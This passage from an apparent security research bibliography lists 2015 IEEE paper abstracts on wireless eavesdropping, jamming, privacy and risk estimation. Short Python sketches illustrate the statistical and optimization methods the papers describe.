Keywords: Browsers; HTML; IEEE 802.11 Standards; Logic gates; Mobile communication; Mobile handsets; Web services; Delay-tolerant networking; Web technologies; Wi-Fi offloading (ID#: 16-9523)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7118725&isnumber=4358975

 

J. Zhu; Y. Zou; B. Champagne; W. P. Zhu; L. Hanzo, "Security-Reliability Trade-off Analysis of Multi-Relay Aided Decode-and-Forward Cooperation Systems," in IEEE Transactions on Vehicular Technology, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TVT.2015.2453364

Abstract: We consider a cooperative wireless network comprising a source, a destination and multiple relays operating in the presence of an eavesdropper that attempts to tap the source-destination transmission. We propose a multi-relay selection scheme for protecting the source against eavesdropping. More specifically, multi-relay selection allows multiple relays to simultaneously forward the source's transmission to the destination, differing from conventional single-relay selection, where only the best relay is chosen to assist the transmission from the source to the destination. For comparison, we consider the classic direct transmission and single-relay selection as benchmark schemes. We derive closed-form expressions for the intercept probability and outage probability of the direct transmission as well as the single-relay and multi-relay selection schemes over Rayleigh fading channels. It is demonstrated that as the outage requirement is relaxed, the intercept performance of the three schemes improves, and vice versa, implying a security versus reliability trade-off (SRT). We also show that both the single-relay and multi-relay selection schemes outperform direct transmission in terms of SRT, demonstrating the advantage of relay selection for protecting the source's transmission against eavesdropping attacks. Finally, upon increasing the number of relays, the SRTs of both the single-relay and multi-relay selection schemes improve significantly and, as expected, multi-relay selection outperforms single-relay selection.

Keywords: Channel capacity; Closed-form solutions; Communication system security; Fading; Relays; Security; Wireless communication; Security-reliability trade-off; eavesdropping attack; intercept probability; outage probability; relay selection (ID#: 16-9524)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7152959&isnumber=4356907
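
The security-reliability trade-off itself is easy to reproduce numerically. The Monte Carlo sketch below uses one common formalization (outage when the main channel cannot support rate R, intercept when the eavesdropper's channel can) and is an illustration rather than the paper's closed-form analysis; the SNR values are invented.

# Hedged sketch: direct transmission over Rayleigh fading. Lowering R
# reduces outages but makes interception easier, and vice versa.
import numpy as np

rng = np.random.default_rng(7)
snr = 10.0                                  # average SNR (linear)
g_d = rng.exponential(size=100_000)         # |h|^2, main channel
g_e = rng.exponential(size=100_000)         # |h|^2, eavesdropper channel

for R in (1.0, 2.0, 3.0):                   # target rate, bits/s/Hz
    p_out = np.mean(np.log2(1 + snr * g_d) < R)
    p_int = np.mean(np.log2(1 + snr * g_e) > R)
    print(f"R={R}: outage={p_out:.3f}, intercept={p_int:.3f}")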

 

Z. Yang; P. Cheng; J. Chen, "Learning-based Jamming Attack against Low-duty-cycle Networks," in IEEE Transactions on Dependable and Secure Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TDSC.2015.2501288

Abstract: Jamming is a typical attack that exploits the open nature of wireless communication, and many researchers have worked on improving the energy efficiency of jamming from the attacker's perspective. In low-duty-cycle wireless sensor networks, where nodes stay asleep most of the time, the design of a jamming attack becomes even more challenging, especially considering the stochastic transmission pattern arising from clock drift and other uncertainties. In this paper, we propose LearJam, a novel learning-based jamming attack strategy against low-duty-cycle networks, featuring a two-phase design consisting of a learning phase and an attacking phase. To degrade network throughput to the maximal degree, LearJam jointly optimizes these two phases subject to an energy constraint, and this optimization is performed iteratively to suit practical implementation. Conversely, we also discuss how state-of-the-art mechanisms can defend against LearJam, which will aid researchers in improving the security of low-duty-cycle networks. Extensive simulations show that our design achieves a significantly higher number of successful attacks and reduces network throughput considerably, especially in sparse low-duty-cycle networks, compared with typical jamming strategies.

Keywords: Clocks; Jamming; Sensors; Throughput; Uncertainty; Wireless communication; Wireless sensor networks; Security; cyber-physical system; jamming attack; low-duty-cycle network (ID#: 16-9525)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7329984&isnumber=4358699

 

Y. Zhang; Y. Shen; H. Wang; J. Yong; X. Jiang, "On Secure Wireless Communications for IoT Under Eavesdropper Collusion," in IEEE Transactions on Automation Science and Engineering, vol. PP, no. 99, pp. 1-13, 2015. doi: 10.1109/TASE.2015.2497663

Abstract: Wireless communication is one of the key technologies that actualize the Internet of Things (IoT) concept in the real world. Understanding the security performance of wireless communications lays the foundation for the security management of IoT. Eavesdropper collusion represents a significant threat to wireless communication security, and physical-layer security serves as a promising approach to providing a strong form of security guarantee. This paper studies the secrecy outage performance of wireless communications under eavesdropper collusion, where physical-layer security is adopted to counteract such attacks. Based on classical probability theory, we first analyze the secrecy outage of the simple noncolluding case, in which eavesdroppers do not collude and operate independently. For the secrecy outage analysis of the more hazardous M-colluding scenario, where any M eavesdroppers can combine their observations to decode the message, the techniques of the Laplace transform, keyhole contour integrals, and the Cauchy Integral Theorem are jointly adopted to work around the highly cumbersome multifold convolution problem involved, so that the related signal-to-interference ratio modeling for all colluding eavesdroppers can be conducted and the corresponding secrecy outage probability (SOP) determined analytically. Finally, simulation and numerical results illustrate our theoretical achievements. An interesting observation is that the SOP increases first superlinearly and then sublinearly with M.

Keywords: Communication system security; Data collection; Relays; Security; Sensors; Wireless communication; Wireless sensor networks; Eavesdropper collusion; Internet of Things (IoT); physical layer security; secrecy outage performance; wireless communication (ID#: 16-9526)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7350251&isnumber=4358066
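
The effect of collusion on secrecy outage can be approximated by simulation, as in the hedged sketch below, where pooling observations is modeled simply as summing the M eavesdroppers' received SNRs; the paper's analytical treatment is far more general, and all parameter values here are invented.

# Hedged sketch: secrecy outage probability vs. number of colluders M.
import numpy as np

rng = np.random.default_rng(3)
N, snr_d, snr_e, Rs = 100_000, 15.0, 1.0, 1.0   # trials, SNRs, secrecy rate

g_d = snr_d * rng.exponential(size=N)            # legitimate channel SNR
for M in (1, 2, 4, 8):
    g_e = snr_e * rng.exponential(size=(N, M)).sum(axis=1)  # pooled SNR
    sop = np.mean(np.log2((1 + g_d) / (1 + g_e)) < Rs)
    print(f"M={M}: secrecy outage probability ~ {sop:.3f}")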


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

 

 

Risk Estimation 2015

 

 
SoS Logo

Risk Estimation 2015

 

Risk estimation is relevant to the Science of Security hard problems of predictive metrics, human behavior, and resilience.  The work cited here was presented in 2015.


Vukovic, M.; Skocir, P.; Katusic, D.; Jevtic, D.; Trutin, D.; Delonga, L., "Estimating Real World Privacy Risk Scenarios," in Telecommunications (ConTEL), 2015 13th International Conference on, vol., no., pp.1-7, 13-15 July 2015. doi: 10.1109/ConTEL.2015.7231214

Abstract: User privacy is becoming an issue on the Internet due to common data breaches and various security threats. Services tend to require private user data in order to provide more personalized content, and users are typically unaware of potential risks to their privacy. This paper continues our work on a user privacy risk calculator based on a feed-forward neural network. Along with the risk estimate, we provide users with real-world example scenarios that depict privacy threats according to the selected input parameters. In this paper, we present a model for selecting the most probable real-world scenario, presented as a comic, thus avoiding overwhelming the user with information that he or she may find confusing. The most probable scenario is estimated by an artificial neural network trained with real-world scenarios and probabilities estimated from real-world occurrences. Additionally, we group real-world scenarios into categories that are presented to the user as further reading on privacy risks.

Keywords: data privacy; feedforward neural nets; learning (artificial intelligence); probability; artificial neural network training; data breach; feed-forward neural network; input parameter selection; personalized content; privacy risks; privacy threats; private user data; probabilities; real-world privacy risk scenario estimation; risk estimation; security threats; user privacy; user privacy risk calculator; Calculators; Electronic mail; Estimation; Internet; Law; Privacy (ID#: 16-9302)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7231214&isnumber=7231179
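
At scoring time, a feed-forward risk calculator of the kind described reduces to a few matrix operations. The sketch below uses invented weights and features purely to show the shape of such a scorer; the paper's network is trained on real scenario data.

# Hedged sketch: a tiny fixed-weight feed-forward privacy risk scorer.
import numpy as np

def risk_score(x, W1, b1, W2, b2):
    h = np.tanh(W1 @ x + b1)                    # hidden layer
    return 1 / (1 + np.exp(-(W2 @ h + b2)))     # sigmoid risk in [0, 1]

x = np.array([1.0, 0.0, 1.0])   # e.g. shares location, no 2FA, public profile
rng = np.random.default_rng(0)
W1, b1 = rng.normal(size=(4, 3)), np.zeros(4)   # placeholder weights
W2, b2 = rng.normal(size=4), 0.0
print("risk:", float(risk_score(x, W1, b1, W2, b2)))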

 

Kasmi, C.; Lallechere, S.; Girard, S.; Prouff, E.; Paladian, F.; Bonnet, P., "Optimization of Experimental Procedure In EMC using Re-Sampling Techniques," in Electromagnetic Compatibility (EMC), 2015 IEEE International Symposium on, pp.1238-1242, 16-22 Aug. 2015. doi: 10.1109/ISEMC.2015.7256347

Abstract: Recent studies have shown high interest in statistical methods dedicated to predicting the maximum confidence in simulations and measurements for Electromagnetic Compatibility (EMC). In particular, it has been shown that one of the main issues remains access to a number of samples sufficient to estimate the risks associated with the test set-up random variables. In this paper, it is argued that re-sampling techniques, also called bootstrapping procedures, make it possible to optimize the number of experiments while estimating the maximum confidence level of the accessible samples.

Keywords: electromagnetic compatibility; optimisation; statistical analysis; EMC; bootstrapping procedures; electromagnetic compatibility; experimental procedure optimization; re-sampling techniques; risk estimation; set-up random variables; statistical methods; Convergence; Electromagnetic compatibility; Estimation; Optimization; Silicon; Sociology; Standards; Electromagnetic Compatibility; Experiments optimization; Statistical methods (ID#: 16-9303)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7256347&isnumber=7256113
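
The bootstrap procedure the paper advocates can be shown in a few lines: re-sample the available measurements with replacement and read a confidence interval off the re-sampled statistic. The data below are synthetic stand-ins for EMC measurements.

# Hedged sketch: bootstrap confidence interval for the sample maximum.
import numpy as np

rng = np.random.default_rng(42)
samples = rng.lognormal(mean=0.0, sigma=0.5, size=30)   # stand-in measurements

boot_max = np.array([
    rng.choice(samples, size=samples.size, replace=True).max()
    for _ in range(5000)])                               # 5000 re-samples
lo, hi = np.percentile(boot_max, [2.5, 97.5])
print(f"observed max={samples.max():.2f}, 95% bootstrap interval=({lo:.2f}, {hi:.2f})")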

 

Aldini, A.; Seigneur, J.-M.; Lafuente, C.B.; Titi, X.; Guislain, J., "Formal Modeling and Verification of Opportunity-enabled Risk Management," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 676-684, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.434

Abstract: With the advent of the Bring-Your-Own-Device (BYOD) trend, mobile work is achieving a widespread diffusion that challenges the traditional view of security standard and risk management. A recently proposed model, called opportunity-enabled risk management (OPPRIM), aims at balancing the analysis of the major threats that arise in the BYOD setting with the analysis of the potential increased opportunities emerging in such an environment, by combining mechanisms of risk estimation with trust and threat metrics. Firstly, this paper provides a logic-based formalization of the policy and metric specification paradigm of OPPRIM. Secondly, we verify the OPPRIM model with respect to the socio-economic perspective. More precisely, this is validated formally by employing tool-supported quantitative model checking techniques.

Keywords: formal specification; formal verification; mobile computing; risk management; security of data; BYOD trend; OPPRIM model; bring-your-own-device; formal modeling; formal verification; logic-based formalization; metric specification paradigm; mobile work; opportunity-enabled risk management; risk management; security standard; socio-economic perspective; threat metric; tool-supported quantitative model checking techniques; trust metric; Access control; Companies; Measurement; Mobile communication; Real-time systems; Risk management; BYOD; model checking; opportunity analysis; risk management (ID#: 16-9304)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345342&isnumber=7345233

 

Abbinaya, S.; Kumar, M.S., "Software Effort and Risk Assessment using Decision Table Trained by Neural Networks," in Communications and Signal Processing (ICCSP), 2015 International Conference on,  pp. 1389-1394, 2-4 April 2015. doi: 10.1109/ICCSP.2015.7322738

Abstract: Software effort estimation is based on predicting properties of the system under development. Many organizations practice risk management, but their risk identification techniques differ. In this paper, we focus on two effort estimation techniques, use case points and function points, which are used to estimate effort in software development. A decision table is used to compare the two methods and analyze which produces the more accurate result. A neural network trained with the back-propagation algorithm is used to train the decision table, and the two effort estimation methods are compared against the actual effort using past project data. Risk is evaluated using a summary of questionnaires received from various software developers; based on the resulting report, risk can also be mitigated in future processes.

Keywords: decision tables; learning (artificial intelligence); neural nets; risk management; software engineering; decision table; neural networks; risk assessment; risk identification techniques; software development; software effort; Algorithm design and analysis; Lead; Security; artificial neural network; back propagation; decision table; feed forward neural networks; function point; regression; risk evaluation; software effort estimation; use case point (ID#: 16-9305)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7322738&isnumber=7322423

 

Abd Latif, Z.; Mohamad, M.H., "Mapping of Dengue Outbreak Distribution Using Spatial Statistics and Geographical Information System," in Information Science and Security (ICISS), 2015 2nd International Conference on, pp. 1-6, 14-16 Dec. 2015. doi: 10.1109/ICISSEC.2015.7371016

Abstract: This study presents a spatial analysis of a Dengue Fever (DF) outbreak using a Geographic Information System (GIS) in the state of Selangor, Malaysia. DF is an Aedes mosquito-borne disease. The aim of the study is to map the spread of the DF outbreak in Selangor and to identify high-risk areas by producing a risk map with GIS tools. The data used were DF cases in 2012 obtained from the Ministry of Health, Malaysia. The analysis was carried out using Moran's I, Average Nearest Neighbor (ANN), Kernel Density Estimation (KDE) and buffer analysis in GIS. The Moran's I analysis shows that the distribution pattern of DF in Selangor is clustered, while the ANN analysis shows a dispersed pattern with a ratio greater than 1. The third analysis used KDE to locate hot spots; the results classify several districts as high-risk areas, namely Ampang, Damansara, Kapar, Kajang, Klang, Semenyih, Sungai Buloh and Petaling. The buffer analysis, over areas ranging from 200 m to 500 m above sea level, shows a clustered pattern in which the most frequent cases of the year occur at the same locations. The study demonstrates that spatial statistics, spatial interpolation, and buffer analysis can be used to control and locate DF infection with the aid of GIS.

Keywords: data analysis; diseases; estimation theory; geographic information systems; pattern classification; risk analysis; ANN; Aedes mosquito-borne disease; GIS; KDE; average nearest neighbor; buffer analysis; dengue fever outbreak distribution; geographical information system; kernel density estimation; risk map; spatial statistics; Artificial neural networks; Diseases; Estimation; Geographic information systems; Kernel; Rivers; Urban areas (ID#: 16-9306)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371016&isnumber=7370954
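
Of the methods listed, global Moran's I is compact enough to sketch directly. The toy example below, with an invented six-site adjacency and case counts, shows how a value near +1 signals the kind of clustering the study reports.

# Hedged sketch: global Moran's I for spatial autocorrelation.
import numpy as np

def morans_i(x, W):
    """x: values at n locations; W: n x n spatial weight matrix."""
    z = x - x.mean()
    return (len(x) / W.sum()) * (z @ W @ z) / (z @ z)

x = np.array([10.0, 12.0, 11.0, 1.0, 0.0, 2.0])   # two clusters of case counts
W = np.array([[0, 1, 1, 0, 0, 0],                 # adjacency: sites 0-2 and 3-5
              [1, 0, 1, 0, 0, 0],
              [1, 1, 0, 0, 0, 0],
              [0, 0, 0, 0, 1, 1],
              [0, 0, 0, 1, 0, 1],
              [0, 0, 0, 1, 1, 0]], dtype=float)
print("Moran's I:", morans_i(x, W))   # near +1 here, indicating clustering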

 

Llanso, T.; Dwivedi, A.; Smeltzer, M., "An Approach for Estimating Cyber Attack Level of Effort," in Systems Conference (SysCon), 2015 9th Annual IEEE International, pp. 14-19, 13-16 April 2015. doi: 10.1109/SYSCON.2015.7116722

Abstract: Timely risk assessments allow organizations to gauge the degree to which cyber attacks threaten their mission/business objectives. Risk plots in such assessments typically include cyber attack likelihood values along with the impact. This paper describes an algorithm and an associated model that allow for estimation of one aspect of cyber attack likelihood, attack level of effort. The approach involves the use of an ordinal set of standardized attacker tiers, associated attacker capabilities, and protections (security controls) required to resist those capabilities.

Keywords: business data processing; organisational aspects; risk management; security of data; attacker capability; business objective; cyber attack likelihood value; mission objective; organizations; risk assessment; security control; standardized attacker tier; Context; NIST; Risk management; Security; Unified modeling language; Attack; Cyber; Level of Effort; Risk (ID#: 16-9307)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116722&isnumber=7116715
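
The ordinal-tier idea can be sketched as a small lookup: each security control on an attack path resists attackers up to some tier, so the level of effort is set by the strongest control the attacker must beat. The tier names and control ratings below are invented, not the paper's taxonomy.

# Hedged sketch: level of effort from ordinal attacker tiers.
TIERS = ["script-kiddie", "criminal", "organized-crime", "nation-state"]

def level_of_effort(path_controls):
    """path_controls: for each control on the attack path, the highest tier
    index it resists; the attacker must exceed the strongest such control."""
    return TIERS[min(max(path_controls) + 1, len(TIERS) - 1)]

# A path protected by controls resisting tiers 0 and 2:
print(level_of_effort([0, 2]))   # -> 'nation-state' effort required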

 

Darimont, R.; Ponsard, C., "Supporting Quantitative Assessment of Requirements in Goal Orientation," in Requirements Engineering Conference (RE), 2015 IEEE 23rd International, pp. 290-291, 24-28 Aug. 2015. doi: 10.1109/RE.2015.7320443

Abstract: Goal-Orientation provides a rich framework for reasoning about systems during the Requirements Engineering (RE) phase. While critical properties like safety or security can require formal semantics, much more lightweight quantitative reasoning on semi-formal models proves sufficient in many projects. Most of the time, existing RE tools only target specific quantification scenarios or do not provide easy mechanisms for implementing them. To demonstrate that such mechanisms can be both generic and powerful, we developed an extension of the Objectiver tool in three directions: (1) internal reasoning capabilities on AND-OR goal/obstacle structures, (2) close integration with an external spreadsheet application, and (3) model export for building assessment tools using model-driven engineering techniques. We also demonstrate how our approach can cope with a variety of industrial scenarios requiring some form of quantification, such as risk analysis, selection of design alternatives, effort estimation, and assessment of customer satisfaction.

Keywords: formal specification; systems analysis; AND-OR goal-obstacles structures; RE phase; external spreadsheet application; formal semantics; goal orientation; model-driven engineering techniques; objectiver tool; requirements engineering; requirements quantitative assessment; semiformal models; Analytical models; Cognition; Estimation; Requirements engineering; Safety; Statistical analysis; Unified modeling language (ID#: 16-9308)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7320443&isnumber=7320393

 

Wenxia Liu; He Li; Huiting Xu; Jianhua Zhang; Dehua Zheng, "Transmission Expansion Planning Based on Hybrid EDA/DE Algorithm Considering Wind Power Penetration," in PowerTech, 2015 IEEE Eindhoven, pp. 1-6, June 29 2015-July 2 2015. doi: 10.1109/PTC.2015.7232538

Abstract: Large-scale transmission expansion planning (TEP) problems place high demands on the calculation speed and precision of the solution method. Combining the respective strengths of the Estimation of Distribution Algorithm (EDA) and the Differential Evolution (DE) algorithm, this paper puts forward a new hybrid EDA/DE algorithm for large-scale TEP problems and improves the updating mechanism of EDA's probabilistic model based on the characteristics of TEP. Considering the investments of the grid company, new-energy incentive policies, and network security constraints, the paper proposes a multi-objective static planning model for TEP with wind power penetration, which takes the comprehensive cost, wind curtailment, and risk value into consideration. Finally, a specific example verifies the applicability and effectiveness of the proposed model and algorithm.

Keywords: evolutionary computation; investment; power transmission economics; power transmission planning; wind power plants; differential evolution algorithm; distribution of estimation algorithm; energy incentive politics; grid company investments; hybrid EDA/DE algorithm; multiobjective static planning model; network security constraints; transmission expansion planning; wind power penetration; Analytical models; Computational modeling; Generators; Probabilistic logic; Differential Evolution; Estimation of Distribution Algorithm; Transmission Expansion Planning; Wind Power Penetration (ID#: 16-9309)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7232538&isnumber=7232233
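
One generation of a hybrid EDA/DE loop, stripped of all power-system detail, might look like the sketch below; the cost function, population sizes, and parameters are placeholders, and the paper's probabilistic-model update for TEP is considerably richer.

# Hedged sketch: hybrid EDA/DE on a toy continuous problem.
import numpy as np

rng = np.random.default_rng(5)

def cost(x):
    return np.sum(x**2, axis=1)   # stand-in for planning cost plus penalties

pop = rng.uniform(-5, 5, size=(20, 4))
for _ in range(50):
    elite = pop[np.argsort(cost(pop))[:5]]
    mu, sigma = elite.mean(axis=0), elite.std(axis=0) + 1e-9
    eda_kids = rng.normal(mu, sigma, size=(10, 4))        # EDA: sample elite model
    idx = rng.integers(0, 20, size=(10, 3))               # DE/rand/1 mutation
    de_kids = pop[idx[:, 0]] + 0.8 * (pop[idx[:, 1]] - pop[idx[:, 2]])
    merged = np.vstack([pop, eda_kids, de_kids])
    pop = merged[np.argsort(cost(merged))[:20]]           # elitist selection

print("best stand-in cost:", cost(pop)[0])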

 

Chessa, M.; Grossklags, J.; Loiseau, P., "A Game-Theoretic Study on Non-monetary Incentives in Data Analytics Projects with Privacy Implications," in Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, pp. 90-104, 13-17 July 2015. doi: 10.1109/CSF.2015.14

Abstract: The amount of personal information contributed by individuals to digital repositories such as social network sites has grown substantially. The existence of this data offers unprecedented opportunities for data analytics research in various domains of societal importance, including medicine and public policy. The results of these analyses can be considered a public good which benefits data contributors as well as individuals who do not make their data available. At the same time, the release of personal information carries perceived and actual privacy risks for the contributors. Our research addresses this problem area. In our work, we study a game-theoretic model in which individuals take control over participation in data analytics projects in two ways: 1) individuals can contribute data at a self-chosen level of precision, and 2) individuals can decide whether they want to contribute at all. From the analyst's perspective, we investigate to what degree the research analyst has flexibility to set requirements for data precision so that individuals are still willing to contribute to the project and the quality of the estimation improves. We study this trade-off scenario for populations of homogeneous and heterogeneous individuals, and determine Nash equilibria that reflect the optimal level of participation and precision of contributions. We further prove that the analyst can substantially increase the accuracy of the analysis by imposing a lower bound on the precision of the data that users can reveal.

Keywords: data analysis; data privacy; game theory; incentive schemes; social networking (online); Nash equilibrium; data analytics; digital repositories; game theoretic study; nonmonetary incentives; personal information; privacy implications; social network sites; Data privacy; Estimation; Games; Noise; Privacy; Sociology; Statistics; Non-cooperative game; data analytics; non-monetary incentives; population estimate; privacy; public good (ID#: 16-9310)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7243727&isnumber=7243713

 

Orojloo, H.; Azgomi, M.A., "Evaluating the Complexity and Impacts of Attacks on Cyber-Physical Systems," in Real-Time and Embedded Systems and Technologies (RTEST), 2015 CSI Symposium on, pp. 1-8, 7-8 Oct. 2015. doi: 10.1109/RTEST.2015.7369840

Abstract: In this paper, a new method for quantitative evaluation of the security of cyber-physical systems (CPSs) is proposed. The proposed method models the different classes of adversarial attacks against CPSs, including cross-domain attacks, i.e., cyber-to-cyber and cyber-to-physical attacks, and takes the secondary consequences of attacks into consideration. The intrusion process of attackers is modeled using an attack graph, and the consequence estimation process of an attack is investigated using a process model. The security attributes and special parameters involved in the security analysis of CPSs have been identified and considered. The quantitative evaluation is based on the probability of attacks, the time-to-shutdown of the system, and security risks. The proposed model is validated in a case study by applying it to a boiling water power plant and estimating suitable security measures.

Keywords: cyber-physical systems; estimation theory; graph theory; probability; security of data; CPS; attack graph; attack probability; consequence estimation process; cross-domain attack; cyber-physical system security; cyber-to-cyber attack; cyber-to-physical attack; security attributes; security risks; time-to-shutdown; Actuators; Computer crime; Cyber-physical systems; Process control; Sensor phenomena and characterization; Cyber-physical systems; attack consequences; modeling; quantitative security evaluation (ID#: 16-9311)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7369840&isnumber=7369836

 

Sahnoune, Z.; Aimeur, E.; El Haddad, G.; Sokoudjou, R., "Watch Your Mobile Payment: An Empirical Study of Privacy Disclosure," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 934-941, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.467

Abstract: Using a smartphone as a payment device has become a highly attractive feature that is increasingly influencing user acceptance. Electronic wallets, near field communication, and mobile shopping applications are all incentives that push users to adopt m-payment. Hence, the sensitive data that already exist on everyone's smartphone can easily be collated with their financial transaction details; in fact, misuse of m-payment can be a real privacy threat. The existing privacy issues regarding m-payment are already numerous and can be caused by different factors. We investigate, through an empirical survey-based study, these factors and their potential correlations and regression values. We identify three factors that directly influence privacy disclosure: the user's privacy concerns, his or her risk perception, and the appropriateness of protection measures. These factors are affected by indirect ones linked to user and technology characteristics and to the behaviour of institutions and companies. In order to analyse the impact of each factor, we define a new research model for privacy disclosure based on several hypotheses. The study is mainly based on a five-item scale survey and on structural equation modelling. In addition to impact estimates for each factor, our results indicate that privacy disclosure in m-payment is primarily driven by the appropriateness of protection measures, which is in turn impacted by m-payment convenience. We discuss in this paper the research model, the methodology, the findings and their significance.

Keywords: Internet; data privacy; human factors; mobile commerce; near-field communication; regression analysis; risk analysis; smart phones; electronic wallets; financial transaction details; m-payment; mobile payments; mobile shopping applications; near field communication; payment device; privacy disclosure; privacy threat; regression values; risk perception; smartphone; structural equation modelling; technology characteristics; user acceptance; user privacy concerns; Context; Data privacy; Mobile communication; Mobile handsets; Privacy; Security; Software; m-payment; privacy concerns; privacy disclosure; privacy perception; privacy policies; structural equation modeling (ID#: 16-9312)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345375&isnumber=7345233

 

Chi-Ping Lin; Chuen-Fa Ni; I-Hsian Li; Chih-Heng Lu, "Stochastic Delineation of Well Capture Zones in Aquifers of Choushui River Alluvial Fan in Central Taiwan," in Security Technology (ICCST), 2015 International Carnahan Conference on, pp. 427-432, 21-24 Sept. 2015. doi: 10.1109/CCST.2015.7389722

Abstract: The delineation of well capture zones is of great importance for accurately defining well head protection areas (WHPAs) for potential groundwater resources and public security. Natural aquifer systems typically involve different degrees of heterogeneity in aquifer parameters, and such parameter variations can directly influence the estimation of flow fields and the delineation of WHPAs. This study employs an unconditional approximate spectral method (ASM) combined with a backward particle tracking algorithm to delineate stochastic well capture zones in aquifers of the Choushui River alluvial fan (CRAF) in central Taiwan. The analysis integrates hourly recorded groundwater observations from 1995 to 2013 as the mean flow field. We apply the developed model to 187 Taiwan Water Corporation (TWC) wells used for domestic water supply in the CRAF. With predefined small-scale heterogeneity in hydraulic conductivity, the uncertainty of capture zones is obtained based on the observed pumping rates at TWC wells. Results of the analyses show that the average distance of the mean capture zones in the first layer of the CRAF is about one kilometer from the TWC wells. Small-scale hydraulic conductivity can induce capture zone uncertainties ranging from meters to tens of meters in one year, depending on the complexity of the flow field. The uncertainty zones of the WHPAs in the CRAF can serve as the basis for risk analysis of drinking water.

Keywords: groundwater; rivers; water supply; AD 1995 to 2013; Choushui river alluvial fan; Taiwan water corporation; WHPA delineation; approximate spectral method; aquifer parameter; aquifer system; backward particle tracking algorithm; central Taiwan; domestic water supply; drinking water; groundwater observation; groundwater resource; hydraulic conductivity; well capture zone stochastic delineation; well head protection area; Bandwidth; Geology; Monitoring; Rivers; Stochastic processes ;Uncertainty; Water pollution; Choushui River alluvial fan; approximate spectral method; capture zone; heterogeneity (ID#: 16-9313)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7389722&isnumber=7389647

 

Junqing Zhang; Woods, R.; Marshall, A.; Duong, T.Q., "An Effective Key Generation System using Improved Channel Reciprocity," in Acoustics, Speech and Signal Processing (ICASSP), 2015 IEEE International Conference on, pp. 1727-1731, 19-24 April 2015. doi: 10.1109/ICASSP.2015.7178266

Abstract: In physical layer security systems there is a clear need to exploit the radio link characteristics to automatically generate an encryption key between two end points. The success of the key generation depends on the channel reciprocity, which is impacted by the non-simultaneous measurements and the white nature of the noise. In this paper, an OFDM subcarriers' channel responses based key generation system with enhanced channel reciprocity is proposed. By theoretically modelling the OFDM subcarriers' channel responses, the channel reciprocity is modelled and analyzed. A low pass filter is accordingly designed to improve the channel reciprocity by suppressing the noise. This feature is essential in low SNR environments in order to reduce the risk of the failure of the information reconciliation phase during key generation. The simulation results show that the low pass filter improves the channel reciprocity, decreases the key disagreement, and effectively increases the success of the key generation.

Keywords: OFDM modulation; cryptography; interference suppression; low-pass filters; radiofrequency interference; risk management; telecommunication network reliability; telecommunication security; wireless channels; OFDM subcarriers channel responses based key generation system; automatic encryption key generation; channel reciprocity improvement; failure risk reduction; information reconciliation phase; low pass filter; noise suppression; nonsimultaneous measurements; physical layer security systems; wireless channel; Analytical models; Channel estimation; Mathematical model; OFDM; Security; Signal to noise ratio; Physical layer security; channel reciprocity; key disagreement; key generation; low pass filter (ID#: 16-9314)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7178266&isnumber=7177909
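
The role of the low-pass filter can be seen in a toy quantization experiment: both ends smooth their noisy, nearly reciprocal channel estimates before thresholding into key bits, and the key disagreement rate drops. Everything below (channel model, noise level, filter length) is an assumption for illustration, not the paper's OFDM system.

# Hedged sketch: channel-reciprocity key bits with and without filtering.
import numpy as np

rng = np.random.default_rng(11)
n = 256
channel = np.cumsum(rng.normal(size=n)) / 5          # slowly varying channel
alice = channel + 0.4 * rng.normal(size=n)           # non-simultaneous, noisy
bob   = channel + 0.4 * rng.normal(size=n)           # estimates at each end

def smooth_bits(x, k=9):                             # moving-average low-pass
    f = np.convolve(x, np.ones(k) / k, mode="same")
    return (f > np.median(f)).astype(int)            # median-threshold quantizer

raw = np.mean((alice > np.median(alice)) != (bob > np.median(bob)))
kdr = np.mean(smooth_bits(alice) != smooth_bits(bob))
print(f"key disagreement: raw={raw:.2%}, filtered={kdr:.2%}")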

 

Sen, A.; Madria, S., "A Risk Assessment Framework for Wireless Sensor Networks in a Sensor Cloud," in Mobile Data Management (MDM), 2015 16th IEEE International Conference on, vol. 2, pp. 38-41, 15-18 June 2015. doi: 10.1109/MDM.2015.52

Abstract: A sensor cloud framework is composed of various heterogeneous wireless sensor networks (WSNs) integrated with a cloud platform. Integration with the cloud platform, in addition to the inherently resource- and power-constrained nature of the sensor nodes, makes the WSNs belonging to a sensor cloud susceptible to security attacks, so there is a need to formulate effective and efficient security measures for such an environment. Doing so, however, requires an understanding of the likelihood and impact of the different attacks feasible on the WSNs. In this paper, we propose a risk assessment framework for the WSNs belonging to a sensor cloud. The proposed framework addresses the feasible set of attacks on a WSN, identifying the relationships between them and thus estimating their likelihood and impact. This kind of assessment gives security administrators a better perspective of their network and helps them formulate the required security measures.

